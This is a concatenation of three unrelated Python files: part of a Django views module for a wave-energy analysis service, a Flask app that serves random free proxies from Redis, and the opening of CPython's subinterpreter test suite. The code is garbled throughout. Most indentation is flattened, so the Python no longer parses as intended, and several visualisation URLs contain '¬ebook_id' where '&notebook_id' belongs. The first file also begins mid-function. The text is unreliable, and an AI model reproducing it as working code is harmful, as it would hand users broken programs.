'url': "/visualizations/get_line_chart_am/?"+y_var+"x_var=i0_time&limit=False&agg_func=AVG&query="+str(visualization_query_id),
'done': False})
service_exec.dataframe_visualizations = visualizations
service_exec.save()
result = dict()
for var in variable_list:
result[str(var['variable'])] = dict()
result[str(var['variable'])]['title'] = str(var['title'])
result[str(var['variable'])]['unit'] = str(var['unit'])
        v_min, v_max, v_avg = get_query_aggregates(visualization_query_id, var)
        result[str(var['variable'])]['min'] = v_min
        result[str(var['variable'])]['max'] = v_max
        result[str(var['variable'])]['avg'] = v_avg
variable_list_with_commas = ''
for var in variable_list:
variable_list_with_commas += var['title'] + ', '
variable_list_with_commas = variable_list_with_commas[:-2]
dataset_title = Dataset.objects.get(pk=dataset_id).title
location_lat = str(latitude_from + abs(latitude_to-latitude_from)/2)
location_lon = str(longitude_from + abs(longitude_to - longitude_from) / 2)
try:
dataset_obj = Dataset.objects.get(id=int(dataset_id))
service_obj = service_exec.service
dataset_service_execution(dataset_obj, service_obj)
service_use(service_obj)
unique_service_use(service_obj, request.user)
service_per_user(service_obj, request.user)
nester_statistics(service_obj, dataset_obj)
except:
print 'Dataset or service does not exist'
try:
user_plan = UserPlans.objects.get(user=request.user)
user_plan.query_count -= 1
user_plan.save()
except:
pass
return render(request, 'wave_energy_pilot/data_visualisation result.html',
{'result': result,
'back_url': '/wave-energy/',
'service_title': 'Visualisation of a single data source',
'study_conditions': [
{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):', 'value': '('+location_lat+', '+location_lon+') +/- ' + str(DATA_RADIUS) + ' degrees'},
{'icon': 'far fa-calendar-alt', 'text': 'Timeframe:', 'value': 'from '+ str(start_date) + ' to ' + str(end_date)},
{'icon': 'fas fa-database', 'text': 'Dataset used:',
'value': str(dataset_title) + ' <a target="_blank" rel="noopener noreferrer" href="/datasets/'+str(dataset_id)+'/" style="color: #1d567e;text-decoration: underline">(more info)</a>'},
{'icon': 'fas fa-info-circle', 'text': 'Selected variables:', 'value': str(variable_list_with_commas)}],
'no_viz': 'no_viz' in request.GET.keys(),
'visualisations': service_exec.dataframe_visualizations})
@never_cache
def single_location_evaluation_execute(request):
service = Service.objects.get(pk=settings.LOCATION_EVALUATION_SERVICE_ID)
check_access(request, service)
service_exec = ServiceInstance(service=service, user=request.user, time=datetime.now(),
status="starting service", dataframe_visualizations=[])
service_exec.save()
# Spawn thread to process the data
t = Thread(target=single_location_evaluation_execution_process, args=(request, service_exec.id))
t.start()
return JsonResponse({'exec_instance': service_exec.id})
def single_location_evaluation_execution_process(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
service = Service.objects.get(pk=service_exec.service_id)
# GATHER THE SERVICE ARGUMENTS
service_args = ["start_date", "end_date", "latitude_from", "latitude_to", "longitude_from", "longitude_to", "dataset_id"]
args_to_note = gather_service_args(service_args, request, service_exec)
args_to_note['dataset_table'] = Dataset.objects.get(pk=int(request.GET["dataset_id"])).table_name
# CONFIGURE THE QUERY TO BE USED
dataset_id = request.GET["dataset_id"]
query_id = settings.LOCATION_EVALUATION_SERVICE_DATASET_QUERY[dataset_id]
wave_height_query_id = get_query_with_updated_filters(request, query_id)
# CLONE THE SERVICE NOTE
new_notebook_id = clone_service_note(request, service, service_exec)
wave_height_query = AbstractQuery.objects.get(pk=int(wave_height_query_id))
twoDvar1 = wave_height_query.document['from'][0]['select'][0]['name']
twoDvar2 = wave_height_query.document['from'][1]['select'][0]['name']
# ADD THE VISUALISATIONS TO BE CREATED
visualisations = dict()
visualisations['v2'] = ({'notebook_id': '',
'df': '',
'query': wave_height_query_id,
'title': "Occurrence matrix",
'url': "/visualizations/get_histogram_2d_am?viz_id=17&action=get_histogram_2d_am&y_var="+str(twoDvar1)+"&x_var="+str(twoDvar2)+"&bins=10&query=" + str(
wave_height_query_id),
'done': False})
visualisations['v3'] = ({'notebook_id': new_notebook_id,
'df': 'power_df',
'query': '',
'title': "Power line chart",
'url': "/visualizations/get_line_chart_am/?y_var[]=power&y_var_unit=kW/m&x_var=time&df=power_df¬ebook_id="+str(new_notebook_id),
'done': False})
visualisations['v4'] = ({'notebook_id': new_notebook_id,
'df': 'power_df',
'query': '',
'title': "Power histogram",
'url': "/visualizations/get_histogram_chart_am/?bins=5&x_var=power&x_var_unit=kW/m&df=power_df¬ebook_id="+str(new_notebook_id),
'done': False})
start_year = int(args_to_note['start_date'].split('-')[0])
end_year = int(args_to_note['end_date'].split('-')[0])
print start_year, end_year
power_availability_vars = ''
unit_list_1 = ''
for year in range(start_year, end_year+1):
power_availability_vars += '&y_var[]=power_'+str(year)
unit_list_1 += 'kW/m,'
unit_list_1 = unit_list_1[:-1]
power_availability_vars += '&y_var_unit=' + unit_list_1
visualisations['v5'] = ({'notebook_id': '',
'df': 'power_df_year_month',
'query': '',
'title': "Monthly availability of waves",
'url': "/visualizations/get_column_chart_am/?x_var=month_name&df=power_df_year_month¬ebook_id="+str(new_notebook_id) + str(power_availability_vars),
'done': False})
service_exec.dataframe_visualizations = visualisations
service_exec.save()
# CREATE NEW ARGUMENTS PARAGRAPH
new_arguments_paragraph = create_args_paragraph(request, new_notebook_id, args_to_note, service)
# CREATE A LIVY SESSION
service_exec.status = "Initializing Spark Session"
service_exec.save()
livy_session = create_service_livy_session(request, service_exec)
try:
# RUN THE SERVICE CODE
execute_service_code(request, service_exec, new_arguments_paragraph, settings.LOCATION_EVALUATION_SERVICE_PARAGRAPHS)
service_exec.status = "done"
service_exec.save()
try:
dataset_obj = Dataset.objects.get(id=int(dataset_id))
service_obj = service_exec.service
dataset_service_execution(dataset_obj, service_obj)
service_use(service_obj)
unique_service_use(service_obj, request.user)
service_per_user(service_obj, request.user)
nester_statistics(service_obj, dataset_obj)
except:
print 'Dataset or service does not exist'
t = Thread(target=clean_up_new_note, args=(str(new_notebook_id), 180))
t.start()
except Exception as e:
print 'exception in livy execution'
print '%s (%s)' % (e.message, type(e))
service_exec.status = "failed"
service_exec.save()
clean_up_new_note(service_exec.notebook_id)
if 'livy_session' in request.GET.keys():
pass
else:
if service_exec.service.through_livy:
close_livy_session(service_exec.livy_session)
@never_cache
def single_location_evaluation_results(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
# GET THE SERVICE RESULTS
result = get_result_dict_from_livy(service_exec.livy_session, 'result')
print 'result: ' + str(result)
# clean_up_new_note(service_exec.notebook_id)
dataset_id = str(result['dataset_id'])
dataset_title = str(Dataset.objects.get(pk=dataset_id))
location_lat = str(result['location_lat'])
location_lon = str(result['location_lon'])
start_date = str(result['start_date'])
end_date = str(result['end_date'])
try:
user_plan = UserPlans.objects.get(user=request.user)
user_plan.query_count -= 1
user_plan.save()
except:
pass
# SHOW THE SERVICE OUTPUT PAGE
return render(request, 'wave_energy_pilot/location_assessment result.html',
{'result': result,
'back_url': '/wave-energy/',
'service_title': 'Wave Energy - Evaluation of a single location',
'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):','value': '(' + location_lat + ', ' + location_lon + ') +/- ' + str(DATA_RADIUS) + ' degrees'},
{'icon': 'far fa-calendar-alt', 'text': 'Timeframe:','value': 'from ' + str(start_date) + ' to ' + str(end_date)},
{'icon': 'fas fa-database', 'text': 'Dataset used:', 'value': str(dataset_title) + ' <a target="_blank" rel="noopener noreferrer" href="/datasets/' + str(dataset_id) + '/" style="color: #1d567e;text-decoration: underline">(more info)</a>'}],
'no_viz': 'no_viz' in request.GET.keys(),
'visualisations': service_exec.dataframe_visualizations})
@never_cache
def single_location_evaluation_status(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
return JsonResponse({'status': service_exec.status})
def cancel_execution(request, exec_instance):
print "Cancelling"
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
service_exec.status = "failed"
service_exec.save()
close_livy_session(int(service_exec.livy_session))
clean_up_new_note(service_exec.notebook_id)
print "Cancelled?"
return JsonResponse({'status': "cancelled"})
@never_cache
def area_location_evaluation_execute(request):
service = Service.objects.get(pk=settings.AREA_EVALUATION_SERVICE_ID)
check_access(request, service)
service_exec = ServiceInstance(service=service, user=request.user, time=datetime.now(),
status="starting service", dataframe_visualizations=[])
service_exec.save()
# Spawn thread to process the data
t = Thread(target=area_location_evaluation_execution_process, args=(request, service_exec.id))
t.start()
return JsonResponse({'exec_instance': service_exec.id})
def area_location_evaluation_execution_process(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
service = Service.objects.get(pk=service_exec.service_id)
# GATHER THE SERVICE ARGUMENTS
service_args = ["start_date", "end_date", "latitude_from", "latitude_to", "longitude_from", "longitude_to", "dataset_id"]
args_to_note = gather_service_args(service_args, request, service_exec)
args_to_note['dataset_table'] = Dataset.objects.get(pk=int(request.GET["dataset_id"])).table_name
# CONFIGURE THE QUERY TO BE USED
dataset_id = request.GET["dataset_id"]
query_id = settings.AREA_EVALUATION_SERVICE_DATASET_QUERY[dataset_id]
wave_height_query_id = get_query_with_updated_filters(request, query_id)
# CLONE THE SERVICE NOTE
new_notebook_id = clone_service_note(request, service, service_exec)
# ADD THE VISUALISATIONS TO BE CREATED
visualisations = dict()
visualisations['v1'] = ({'notebook_id': '',
'df': '',
'query': wave_height_query_id,
'title': "Mean significant wave height",
'url': "/visualizations/get_map_visualization/?layer_count=1&viz_id0=20&action0=get_map_contour&contour_var0=i0_sea_surface_wave_significant_height&n_contours0=50&step0=0.1&agg_func=AVG&query0="+str(wave_height_query_id),
'done': False})
visualisations['v2'] = ({'notebook_id': '',
'df': '',
'query': wave_height_query_id,
'title': "Mean wave period",
'url': "/visualizations/get_map_visualization/?layer_count=1&viz_id0=20&action0=get_map_contour&contour_var0=i1_sea_surface_wave_zero_upcrossing_period&n_contours0=50&step0=0.1&agg_func=AVG&query0=" + str(wave_height_query_id),
'done': False})
visualisations['v3'] = ({'notebook_id': new_notebook_id,
'df': 'power_df',
'query': '',
'title': "Mean wave power",
'url': "/visualizations/get_map_visualization/?layer_count=1&viz_id0=20&action0=get_map_contour&contour_var0=avg_power&contour_var_unit0=kW/m&n_contours0=50&step0=0.1&agg_func=AVG&lat_col0=i0_latitude&lon_col0=i0_longitude&df0=power_df¬ebook_id0=" + str(new_notebook_id),
'done': False})
visualisations['v4'] = ({'notebook_id': '',
'df': '',
'query': wave_height_query_id,
'title': "Maximum significant wave height",
'url': "/visualizations/get_map_visualization/?layer_count=1&viz_id0=20&action0=get_map_contour&contour_var0=i0_sea_surface_wave_significant_height&n_contours0=50&step0=0.1&agg_func=MAX&query0=" + str(
wave_height_query_id),
'done': False})
visualisations['v5'] = ({'notebook_id': new_notebook_id,
'df': 'power_df',
'query': '',
'title': "Maximum wave power",
'url': "/visualizations/get_map_visualization/?layer_count=1&viz_id0=20&action0=get_map_contour&contour_var0=max_power&contour_var_unit0=kW/m&n_contours0=50&step0=0.1&agg_func=AVG&lat_col0=i0_latitude&lon_col0=i0_longitude&df0=power_df¬ebook_id0=" + str(new_notebook_id),
'done': False})
service_exec.dataframe_visualizations = visualisations
service_exec.save()
# CREATE NEW ARGUMENTS PARAGRAPH
new_arguments_paragraph = create_args_paragraph(request, new_notebook_id, args_to_note, service)
# CREATE A LIVY SESSION
service_exec.status = "Initializing Spark Session"
service_exec.save()
livy_session = create_service_livy_session(request, service_exec)
try:
# RUN THE SERVICE CODE
execute_service_code(request, service_exec, new_arguments_paragraph, settings.AREA_EVALUATION_SERVICE_PARAGRAPHS)
service_exec.status = "done"
service_exec.save()
try:
dataset_obj = Dataset.objects.get(id=int(dataset_id))
service_obj = service_exec.service
dataset_service_execution(dataset_obj, service_obj)
service_use(service_obj)
unique_service_use(service_obj, request.user)
service_per_user(service_obj, request.user)
nester_statistics(service_obj, dataset_obj)
except:
print 'Dataset or service does not exist'
clean_up_new_note(service_exec.notebook_id)
except Exception as e:
print 'exception in livy execution'
print '%s (%s)' % (e.message, type(e))
service_exec.status = "failed"
service_exec.save()
clean_up_new_note(service_exec.notebook_id)
if 'livy_session' in request.GET.keys():
pass
else:
if service_exec.service.through_livy:
close_livy_session(service_exec.livy_session)
def area_location_evaluation_results(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
# GET THE SERVICE RESULTS
result = get_result_dict_from_livy(service_exec.livy_session, 'result')
print 'result: ' + str(result)
# clean_up_new_note(service_exec.notebook_id)
dataset_id = str(result['dataset_id'])
dataset_title = str(Dataset.objects.get(pk=dataset_id))
latitude_from = str(result['latitude_from'])
latitude_to = str(result['latitude_to'])
longitude_from = str(result['longitude_from'])
longitude_to = str(result['longitude_to'])
start_date = str(result['start_date'])
end_date = str(result['end_date'])
try:
user_plan = UserPlans.objects.get(user=request.user)
user_plan.query_count -= 3
user_plan.save()
except:
pass
# SHOW THE SERVICE OUTPUT PAGE
return render(request, 'wave_energy_pilot/area_assessment result.html',
{'result': result,
'back_url': '/wave-energy/',
'service_title': 'Wave Energy - Wave atlas of a region',
'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):','value': 'from (' + latitude_from + ', ' + longitude_from + ') to (' + latitude_to + ', ' + longitude_to + ')'},
{'icon': 'far fa-calendar-alt', 'text': 'Timeframe:','value': 'from ' + str(start_date) + ' to ' + str(end_date)},
{'icon': 'fas fa-database', 'text': 'Dataset used:', 'value': str(dataset_title) + ' <a target="_blank" rel="noopener noreferrer" href="/datasets/' + str(dataset_id) + '/" style="color: #1d567e;text-decoration: underline">(more info)</a>'}],
'no_viz': 'no_viz' in request.GET.keys(),
'visualisations': service_exec.dataframe_visualizations})
@never_cache
def area_location_evaluation_status(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
return JsonResponse({'status': service_exec.status})
@never_cache
def wave_forecast_execute(request):
service = Service.objects.get(pk=settings.WAVE_FORECAST_SERVICE_ID)
check_access(request, service)
service_exec = ServiceInstance(service=service, user=request.user, time=datetime.now(),
status="starting service", dataframe_visualizations=[])
service_exec.save()
# Spawn thread to process the data
t = Thread(target=wave_forecast_execution_process, args=(request, service_exec.id))
t.start()
return JsonResponse({'exec_instance': service_exec.id})
def wave_forecast_execution_process(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
service = Service.objects.get(pk=service_exec.service_id)
# GATHER THE SERVICE ARGUMENTS
service_args = ["start_date", "end_date", "latitude_from", "latitude_to", "longitude_from", "longitude_to", 'dataset_id']
args_to_note = gather_service_args(service_args, request, service_exec)
args_to_note['dataset_table'] = Dataset.objects.get(pk=int(request.GET["dataset_id"])).table_name
# CONFIGURE THE QUERY TO BE USED
dataset_id = request.GET["dataset_id"]
query_id = settings.WAVE_FORECAST_SERVICE_DATASET_QUERY[dataset_id]
wave_forecast_query_id = get_query_with_updated_filters(request, query_id)
wave_forecast_query = AbstractQuery.objects.get(pk=int(wave_forecast_query_id))
twoDvar1 = wave_forecast_query.document['from'][0]['select'][0]['name']
twoDvar2 = wave_forecast_query.document['from'][1]['select'][0]['name']
# CLONE THE SERVICE NOTE
new_notebook_id = clone_service_note(request, service, service_exec)
# ADD THE VISUALISATIONS TO BE CREATED
visualisations = dict()
visualisations['v1'] = ({'notebook_id': '',
'df': '',
'query': wave_forecast_query_id,
'url': "/visualizations/get_line_chart_am/?y_var[]="+twoDvar1+"&x_var=i0_time&limit=False&query="+str(wave_forecast_query_id),
'done': False,
'title': 'Wave significant height'})
visualisations['v2'] = ({'notebook_id': '',
'df': '',
'query': wave_forecast_query_id,
'url': "/visualizations/get_line_chart_am/?y_var[]="+twoDvar2+"&x_var=i0_time&limit=False&query=" + str(
wave_forecast_query_id),
'done': False,
'title': 'Wave mean period'})
visualisations['v3'] = ({'notebook_id': new_notebook_id,
'df': 'power_df',
'query': '',
'url': "/visualizations/get_line_chart_am/?y_var[]=power&y_var_unit=kW&x_var=time&df=power_df¬ebook_id="+str(new_notebook_id),
'done': False,
'title': 'Wave Energy'})
service_exec.dataframe_visualizations = visualisations
service_exec.save()
# CREATE NEW ARGUMENTS PARAGRAPH
new_arguments_paragraph = create_args_paragraph(request, new_notebook_id, args_to_note, service)
# CREATE A LIVY SESSION
service_exec.status = "Initializing Spark Session"
service_exec.save()
livy_session = create_service_livy_session(request, service_exec)
try:
# RUN THE SERVICE CODE
execute_service_code(request, service_exec, new_arguments_paragraph, settings.WAVE_FORECAST_SERVICE_PARAGRAPHS)
service_exec.status = "done"
service_exec.save()
try:
dataset_obj = Dataset.objects.get(id=int(dataset_id))
service_obj = service_exec.service
dataset_service_execution(dataset_obj, service_obj)
service_use(service_obj)
unique_service_use(service_obj, request.user)
service_per_user(service_obj, request.user)
nester_statistics(service_obj, dataset_obj)
except:
print 'Dataset or service does not exist'
clean_up_new_note(service_exec.notebook_id)
except Exception as e:
print 'exception in livy execution'
print '%s (%s)' % (e.message, type(e))
service_exec.status = "failed"
service_exec.save()
clean_up_new_note(service_exec.notebook_id)
if 'livy_session' in request.GET.keys():
pass
else:
if service_exec.service.through_livy:
close_livy_session(service_exec.livy_session)
@never_cache
def wave_forecast_results(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
# GET THE SERVICE RESULTS
result = get_result_dict_from_livy(service_exec.livy_session, 'result')
print('result: ' + str(result))
# clean_up_new_note(service_exec.notebook_id)
dataset_id = str(result['dataset_id'])
dataset_title = str(Dataset.objects.get(pk=dataset_id))
location_lat = str(result['location_lat'])
location_lon = str(result['location_lon'])
start_date = str(result['start_date'])
end_date = str(result['end_date'])
try:
user_plan = UserPlans.objects.get(user=request.user)
user_plan.query_count -= 2
user_plan.save()
except Exception:
pass
# SHOW THE SERVICE OUTPUT PAGE
return render(request, 'wave_energy_pilot/wave_forecast result.html',
{'result': result,
'back_url': '/wave-energy/',
'service_title': 'Wave Energy - Wave forecast in a location',
'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):','value': '(' + location_lat + ', ' + location_lon + ') +/- ' + str(DATA_RADIUS) + ' degrees'},
{'icon': 'far fa-calendar-alt', 'text': 'Timeframe:','value': 'from ' + str(start_date) + ' to ' + str(end_date)},
{'icon': 'fas fa-database', 'text': 'Dataset used:', 'value': str(dataset_title) + ' <a target="_blank" rel="noopener noreferrer" href="/datasets/' + str(dataset_id) + '/" style="color: #1d567e;text-decoration: underline">(more info)</a>'}],
'no_viz': 'no_viz' in request.GET.keys(),
'visualisations': service_exec.dataframe_visualizations})
@never_cache
def wave_forecast_status(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
return JsonResponse({'status': service_exec.status})
def get_load_matching_file_data(request):
import csv
result_list = list()
file_name = request.GET['file']
file_path = 'wave_energy_pilot/static/wave_energy_pilot/files/load_matching/'+file_name
# file_path = 'visualizer/static/visualizer/files/kml2.json'
with open(file_path, mode="r") as infile:
reader = csv.reader(infile)
result_list = [{"time": rows[0], "value": rows[1]} for rows in reader if len(rows) > 0]
return JsonResponse({"result": result_list[1:]})
|
web_app.py
|
from flask import Flask, g, render_template
from multiprocessing import Process
from module import verifyIP
import redis
import threading
from tools.settings import *
__all__ = ['app']
app = Flask(__name__)
def get_conn():
if not hasattr(g, 'conn_redis'):
redis_pool = redis.ConnectionPool(host='127.0.0.1', port=6379)
g.conn_redis = redis.Redis(connection_pool=redis_pool)
return g.conn_redis
@app.route('/')
def index():
return render_template('index.html')
# random HTTP proxy
@app.route('/random_http')
def get_proxy():
conn = get_conn()
result = conn.srandmember("freeProxy:AfterVerifyOKhttp", 1)
if result:
ip = result[0]
return ip
else:
return "HTTP proxies is empty"
# random HTTPS proxy
@app.route('/random_https')
def get_proxy_s():
conn = get_conn()
result = conn.srandmember("freeProxy:AfterVerifyOKhttps", 1)
if result:
ip = result[0]
return ip
else:
return "HTTPS proxies is empty"
# total size of the proxy pool
@app.route('/count')
def get_counts():
conn = get_conn()
http_before = conn.scard("freeProxy:BeforeVerifyhttp")
https_before = conn.scard("freeProxy:BeforeVerifyhttps")
http_after_bad = conn.scard("freeProxy_Bad:AfterVerifyFailhttp")
https_after_bad = conn.scard("freeProxy_Bad:AfterVerifyFailhttps")
http_after_ok = conn.scard("freeProxy:AfterVerifyOKhttp")
https_after_ok = conn.scard("freeProxy:AfterVerifyOKhttps")
return render_template('count.html',
http_before=http_before,
https_before=https_before,
http_after_bad=http_after_bad,
https_after_bad=https_after_bad,
http_after_ok=http_after_ok,
https_after_ok=https_after_ok)
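# Hypothetical usage once the app below is running (host/port per app.run):
#   curl http://127.0.0.1:7865/random_http   # -> one proxy, e.g. 1.2.3.4:8080
#   curl http://127.0.0.1:7865/random_https  # -> one HTTPS proxy, or the empty-pool message
#   curl http://127.0.0.1:7865/count         # -> count.html rendered with the pool sizes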
if __name__ == '__main__':
print('Proxy pool is starting')
POOL = redis.ConnectionPool(host='127.0.0.1', port=6379)
CONN_REDIS = redis.Redis(connection_pool=POOL)
# collect free proxies with multiple threads
# dynamically discover all collector functions currently in scope
jobs = []
print(dir())
for attr in dir():
if attr.startswith("proxy__"):
# the nianshao.me site has shut down, so it is excluded here
if attr not in ["proxy__test", "proxy__nianshao"]:
# every function whose name starts with proxy__ joins the jobs list
jobs.append(threading.Thread(target=locals()[attr], args=(CONN_REDIS,)))
# start the collector threads
for t in jobs:
t.start()
# start the verification process
verify_process = Process(target=verifyIP.fresh_proxy_thread_task)
verify_process.start()
# start the web app
app.run(host="0.0.0.0", port=7865)
|
test__xxsubinterpreters.py
|
from collections import namedtuple
import contextlib
import itertools
import os
import pickle
import sys
from textwrap import dedent
import threading
import time
import unittest
from test import support
from test.support import script_helper
interpreters = support.import_module('_xxsubinterpreters')
##################################
# helpers
def powerset(*sets):
return itertools.chain.from_iterable(
itertools.combinations(sets, r)
for r in range(len(sets)+1))
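# e.g. list(powerset('a', 'b')) -> [(), ('a',), ('b',), ('a', 'b')]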
def _captured_script(script):
r, w = os.pipe()
indented = script.replace('\n', '\n ')
wrapped = dedent(f"""
import contextlib
with open({w}, 'w') as spipe:
with contextlib.redirect_stdout(spipe):
{indented}
""")
return wrapped, open(r)
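# Sketch of how the capture helper composes (the pipe's write fd is baked into
# the wrapped source, so whichever interpreter runs it writes to the same pipe):
#   wrapped, rpipe = _captured_script('print("hi")')
#   with rpipe:
#       interpreters.run_string(interp, wrapped)
#       out = rpipe.read()  # -> 'hi\n'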
def _run_output(interp, request, shared=None):
script, rpipe = _captured_script(request)
with rpipe:
interpreters.run_string(interp, script, shared)
return rpipe.read()
@contextlib.contextmanager
def _running(interp):
r, w = os.pipe()
def run():
interpreters.run_string(interp, dedent(f"""
# wait for "signal"
with open({r}) as rpipe:
rpipe.read()
"""))
t = threading.Thread(target=run)
t.start()
yield
with open(w, 'w') as spipe:
spipe.write('done')
t.join()
#@contextmanager
#def run_threaded(id, source, **shared):
# def run():
# run_interp(id, source, **shared)
# t = threading.Thread(target=run)
# t.start()
# yield
# t.join()
def run_interp(id, source, **shared):
_run_interp(id, source, shared)
def _run_interp(id, source, shared, _mainns={}):
source = dedent(source)
main = interpreters.get_main()
if main == id:
if interpreters.get_current() != main:
raise RuntimeError
# XXX Run a func?
exec(source, _mainns)
else:
interpreters.run_string(id, source, shared)
def run_interp_threaded(id, source, **shared):
def run():
_run_interp(id, source, shared)
t = threading.Thread(target=run)
t.start()
t.join()
class Interpreter(namedtuple('Interpreter', 'name id')):
@classmethod
def from_raw(cls, raw):
if isinstance(raw, cls):
return raw
elif isinstance(raw, str):
return cls(raw)
else:
raise NotImplementedError
def __new__(cls, name=None, id=None):
main = interpreters.get_main()
if id == main:
if not name:
name = 'main'
elif name != 'main':
raise ValueError(
'name mismatch (expected "main", got "{}")'.format(name))
id = main
elif id is not None:
if not name:
name = 'interp'
elif name == 'main':
raise ValueError('name mismatch (unexpected "main")')
if not isinstance(id, interpreters.InterpreterID):
id = interpreters.InterpreterID(id)
elif not name or name == 'main':
name = 'main'
id = main
else:
id = interpreters.create()
self = super().__new__(cls, name, id)
return self
# XXX expect_channel_closed() is unnecessary once we improve exc propagation.
@contextlib.contextmanager
def expect_channel_closed():
try:
yield
except interpreters.ChannelClosedError:
pass
else:
assert False, 'channel not closed'
class ChannelAction(namedtuple('ChannelAction', 'action end interp')):
def __new__(cls, action, end=None, interp=None):
if not end:
end = 'both'
if not interp:
interp = 'main'
self = super().__new__(cls, action, end, interp)
return self
def __init__(self, *args, **kwargs):
if self.action == 'use':
if self.end not in ('same', 'opposite', 'send', 'recv'):
raise ValueError(self.end)
elif self.action in ('close', 'force-close'):
if self.end not in ('both', 'same', 'opposite', 'send', 'recv'):
raise ValueError(self.end)
else:
raise ValueError(self.action)
if self.interp not in ('main', 'same', 'other', 'extra'):
raise ValueError(self.interp)
def resolve_end(self, end):
if self.end == 'same':
return end
elif self.end == 'opposite':
return 'recv' if end == 'send' else 'send'
else:
return self.end
def resolve_interp(self, interp, other, extra):
if self.interp == 'same':
return interp
elif self.interp == 'other':
if other is None:
raise RuntimeError
return other
elif self.interp == 'extra':
if extra is None:
raise RuntimeError
return extra
elif self.interp == 'main':
if interp.name == 'main':
return interp
elif other and other.name == 'main':
return other
else:
raise RuntimeError
# Per __init__(), there aren't any others.
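# e.g. ChannelAction('use', 'opposite', 'other').resolve_end('send') -> 'recv'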
class ChannelState(namedtuple('ChannelState', 'pending closed')):
def __new__(cls, pending=0, *, closed=False):
self = super().__new__(cls, pending, closed)
return self
def incr(self):
return type(self)(self.pending + 1, closed=self.closed)
def decr(self):
return type(self)(self.pending - 1, closed=self.closed)
def close(self, *, force=True):
if self.closed:
if not force or self.pending == 0:
return self
return type(self)(0 if force else self.pending, closed=True)
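# Sketch of the bookkeeping semantics (illustration only):
#   s = ChannelState()       # ChannelState(pending=0, closed=False)
#   s = s.incr()             # pending=1: one unreceived message
#   s.close(force=False)     # -> ChannelState(pending=1, closed=True), drain allowed
#   s.close(force=True)      # -> ChannelState(pending=0, closed=True), items dropped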
def run_action(cid, action, end, state, *, hideclosed=True):
if state.closed:
if action == 'use' and end == 'recv' and state.pending:
expectfail = False
else:
expectfail = True
else:
expectfail = False
try:
result = _run_action(cid, action, end, state)
except interpreters.ChannelClosedError:
if not hideclosed and not expectfail:
raise
result = state.close()
else:
if expectfail:
raise AssertionError('action unexpectedly succeeded')  # XXX
return result
def _run_action(cid, action, end, state):
if action == 'use':
if end == 'send':
interpreters.channel_send(cid, b'spam')
return state.incr()
elif end == 'recv':
if not state.pending:
try:
interpreters.channel_recv(cid)
except interpreters.ChannelEmptyError:
return state
else:
raise Exception('expected ChannelEmptyError')
else:
interpreters.channel_recv(cid)
return state.decr()
else:
raise ValueError(end)
elif action == 'close':
kwargs = {}
if end in ('recv', 'send'):
kwargs[end] = True
interpreters.channel_close(cid, **kwargs)
return state.close()
elif action == 'force-close':
kwargs = {
'force': True,
}
if end in ('recv', 'send'):
kwargs[end] = True
interpreters.channel_close(cid, **kwargs)
return state.close(force=True)
else:
raise ValueError(action)
def clean_up_interpreters():
for id in interpreters.list_all():
if id == 0: # main
continue
try:
interpreters.destroy(id)
except RuntimeError:
pass # already destroyed
def clean_up_channels():
for cid in interpreters.channel_list_all():
try:
interpreters.channel_destroy(cid)
except interpreters.ChannelNotFoundError:
pass # already destroyed
class TestBase(unittest.TestCase):
def tearDown(self):
clean_up_interpreters()
clean_up_channels()
##################################
# misc. tests
class IsShareableTests(unittest.TestCase):
def test_default_shareables(self):
shareables = [
# singletons
None,
# builtin objects
b'spam',
'spam',
10,
-10,
]
for obj in shareables:
with self.subTest(obj):
self.assertTrue(
interpreters.is_shareable(obj))
def test_not_shareable(self):
class Cheese:
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
class SubBytes(bytes):
"""A subclass of a shareable type."""
not_shareables = [
# singletons
True,
False,
NotImplemented,
...,
# builtin types and objects
type,
object,
object(),
Exception(),
100.0,
# user-defined types and objects
Cheese,
Cheese('Wensleydale'),
SubBytes(b'spam'),
]
for obj in not_shareables:
with self.subTest(repr(obj)):
self.assertFalse(
interpreters.is_shareable(obj))
class ShareableTypeTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.cid = interpreters.channel_create()
def tearDown(self):
interpreters.channel_destroy(self.cid)
super().tearDown()
def _assert_values(self, values):
for obj in values:
with self.subTest(obj):
interpreters.channel_send(self.cid, obj)
got = interpreters.channel_recv(self.cid)
self.assertEqual(got, obj)
self.assertIs(type(got), type(obj))
# XXX Check the following in the channel tests?
#self.assertIsNot(got, obj)
def test_singletons(self):
for obj in [None]:
with self.subTest(obj):
interpreters.channel_send(self.cid, obj)
got = interpreters.channel_recv(self.cid)
# XXX What about between interpreters?
self.assertIs(got, obj)
def test_types(self):
self._assert_values([
b'spam',
9999,
self.cid,
])
def test_bytes(self):
self._assert_values(i.to_bytes(2, 'little', signed=True)
for i in range(-1, 258))
def test_int(self):
self._assert_values(itertools.chain(range(-1, 258),
[sys.maxsize, -sys.maxsize - 1]))
def test_non_shareable_int(self):
ints = [
sys.maxsize + 1,
-sys.maxsize - 2,
2**1000,
]
for i in ints:
with self.subTest(i):
with self.assertRaises(OverflowError):
interpreters.channel_send(self.cid, i)
##################################
# interpreter tests
class ListAllTests(TestBase):
def test_initial(self):
main = interpreters.get_main()
ids = interpreters.list_all()
self.assertEqual(ids, [main])
def test_after_creating(self):
main = interpreters.get_main()
first = interpreters.create()
second = interpreters.create()
ids = interpreters.list_all()
self.assertEqual(ids, [main, first, second])
def test_after_destroying(self):
main = interpreters.get_main()
first = interpreters.create()
second = interpreters.create()
interpreters.destroy(first)
ids = interpreters.list_all()
self.assertEqual(ids, [main, second])
class GetCurrentTests(TestBase):
def test_main(self):
main = interpreters.get_main()
cur = interpreters.get_current()
self.assertEqual(cur, main)
self.assertIsInstance(cur, interpreters.InterpreterID)
